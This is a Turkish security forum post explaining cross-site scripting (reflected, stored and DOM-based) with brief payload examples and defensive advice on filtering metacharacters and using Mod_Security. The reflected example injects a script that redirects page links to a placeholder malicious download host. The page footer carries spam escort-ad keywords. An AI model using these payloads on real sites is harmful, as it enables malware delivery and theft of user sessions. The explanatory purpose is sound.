ForumSevgisi.Com

  ForumSevgisi.Com > ForumSevgisi Sosyal Medya - Teknoloji - Oyun Bölümü > Bilgisayar Ve Donanım > Güvenlik


XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir?


XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir?

Bilgisayar Ve Donanım Kategorisinde ve Güvenlik Forumunda Bulunan XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir? Konusunu Görüntülemektesiniz,Konu İçerigi Kısaca ->> XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir? XSS/CSS Cross Site Scripting yani "Çapraz Site Betik Saldırısı" olarak da bilinir. ...

Kullanıcı Etiket Listesi

Yeni Konu aç  Cevapla
LinkBack Seçenekler Stil

Okunmamış 11 Ocak 2015, 10:11   #1
Durumu:
Çevrimdışı
-X- - ait Kullanıcı Resmi (Avatar)
Ruhsuz
Üyelik tarihi: 25 Ekim 2014
Şehir: null
Mesajlar: 1.667
Konular: 293
Beğenilen: 757
Beğendiği: 824
www.forumsevgisi.com
Standart XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir?

XSS/CSS | Cross Site Scripting Nedir? Nasıl Engellenir?

XSS/CSS Cross Site Scripting yani "Çapraz Site Betik Saldırısı" olarak da bilinir. Peki detaylı olarak anlatacak olursak nedir bu XSS?

Netscape, JavaScript dilinin tarayıcılarında çalıştırılabileceğini duyurduğunda web sunucusu tarafından gönderilen ve istemcide çalıştrılabilen kodların güvenlik riskleri yaratabileceğini göstermiş oluyordu. Örneğin, bir sayfadan çalıştırılan betik diğer bir sayfaya ulaşabilecekti. Kötü niyetli bir web sitesinin bu yolla diğer sitelerin bilgilerini çalması üzerine bu ayrıcalık kısıtlanmış ve söz konusu betiklerin yalnızca aynı alan adı üzerinde kullanılmasına karar verilmiştir.

O zamandan bu yana, kötü niyetli sitelerden korunmak için küçük erişim kontrolü tedbirleri geliştirildi. Genelde cross site scripting açıkları, saldırganın sistemi deneme-yanılma yaparak bulması ile ortaya çıkmaktadır. Açığın bulunması ile saldırgan, başka bir alan adından, açığın bulunduğu alan adı ve sayfanın bilgilerini, oturum ayrıntılarını ve diğer nesne değerlerini çalabilmektedir.

Bu atak türü 3 şekilde karşımıza çıkmaktadır. Temel neden ise meta karakterlerin filtrelenmemiş olmasıdır. Böylece hacker, XSS payloadlarını çalıştırarak cookie dediğimiz çerezleri yani oturum bilgilerine erişmeyi hedefler. Bunun yanında ActiveX gibi denetimleri kullanarak hedef sisteme trojan, casus yazılımlar indirmeyi de seçebilir. Bir diğer dikkat edilmesi gereken nokta ise şayet "DOM Based XSS" açığı tespit edilirse açığın bulunduğu sistem deface edilir yani hacklenir.


1 - Reflected XSS Atakları;

Bu saldırı, hedefin URL alanına yada veri girdi alanlarına yapılır. Reflected XSS atağı sonucunda sistem üzerindeki diğer kullanıcılar bu saldırıyı görmez sadece atağı yapan görür. Temel amacı daha önce yazılan bilgi çalmaya yarayan scripte yönlendirmedir. Örnek verecek olursam;

PHP- Kodu:
hedefsistem.url/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); 
AllLinks[0].href "http://zararlisunucu.url/yazilim.exe"; }</script> 
şeklinde bir atak sonucunda atağa maruz kalan kullanıcı zararlı yazılımın bılunduğu sunucuya gidecek ve böylece zararlı yazılımı bilgisayarına indirmiş olacaktır.


2 - Stored XSS Atakları;

Reflected'ın aksine bu atak sonucunda gönderilen veriler veritabanına kayıt edileceği için, atağın yapıldığı adrese uğrayan tüm kullanıcılar buna maruz kalır. Örnek verecek olursam ;

PHP- Kodu:
<input class="inputbox" type="text" name="email" size="40" value="[email protected]"ZARARLI KOD <!-- /> 
İnput alanlarına eklenen bu girdi sonucu gönderilen post metodu veritabanına kayıt edilecek ve böylece sayfayı ziyaret eden her kullanıcı atağa maruz kalacaktır.



3 - DOM XSS Atakları;

Doğru kullanım ile en etkili atak halini alır diyebiliriz. DOM atak yapılırken Javascript kodları zararlı bir şekilde kullanılır Atak sonucunda sayfa içeriği değiştirilip zararlı kodlar eklenebilir yada sistem hacklenebilir. Yine örnek verecek olursam;

PHP- Kodu:
http://www.hedefsite.url/kanyak.pdf#kaynak=javascript:saldiri_scripti_buraya_gelsin 
Görüldüğü üzere DOM atak sonucunda pdf dosyasının bulunduğu url manipüle edilmiştir.

Peki alınması gereken önlemler nelerdir?

Filtreleme eksikliği sonucu oluşan bir açık olduğunu belirtmiştim. Web içerik geliştiriciler URL, veri girdisi ve form alanlarında;

PHP- Kodu:
` % ‘ ; / ? : @ = & <> \ ^~ [ ] { } “ # | 
gibi meta karakterlerini filtreler ise açık oluşmayacaktır. Bir diğer önerim ise Mod_Security gibi güvenlik yazılımları kullanmanızdır. Açık mevcutsa ve saldırgan sistemi sömürmek istiyorsa Mod_Security eklentisi gelen talebi reddedecektir.


Hazırlama, anlatım, düzenleme @-X-'e aittir.
________________

Sizin İmza Resimleri Görmeniz İçin Yetkiniz Yok. Lütfen Üye Olun.


Noyan..
imza
Alıntı ile Cevapla
Yeni Konu aç  Cevapla

Etiketler
blackbox, cross, dom, engellenir, güvenlik, hacking, nasil, nedir, pen test, pentesting, reflected, saldırı, scripting, security, site, stored, xss, xss css, önlemler

Seçenekler
Stil


Saat: 23:53

Forum Yasal Uyarı
vBulletin® ile Oluşturuldu
Copyright © 2016 vBulletin Solutions, Inc. All rights reserved.

ForumSevgisi.Com Her Hakkı Saklıdır
Tema Tasarım:
Kronik Depresif


Sitemiz bir 'paylaşım' sitesidir. Bu yüzden sitemize kayıt olan herkes kontrol edilmeksizin mesaj/konu/resim paylaşabiliyorlar. Bu sebepten ötürü, sitemizdeki mesaj ya da konulardan doğabilecek yasal sorumluluklar o yazıyı paylaşan kullanıcıya aittir ve iletişim adresine mail atıldığı taktirde mesaj ya da konu en fazla 48 saat içerisinde silinecektir.

ankara escort, izmir escort ankara escort, ankara escort bayan, eryaman escort, bursa escort pendik escort, antalya escort,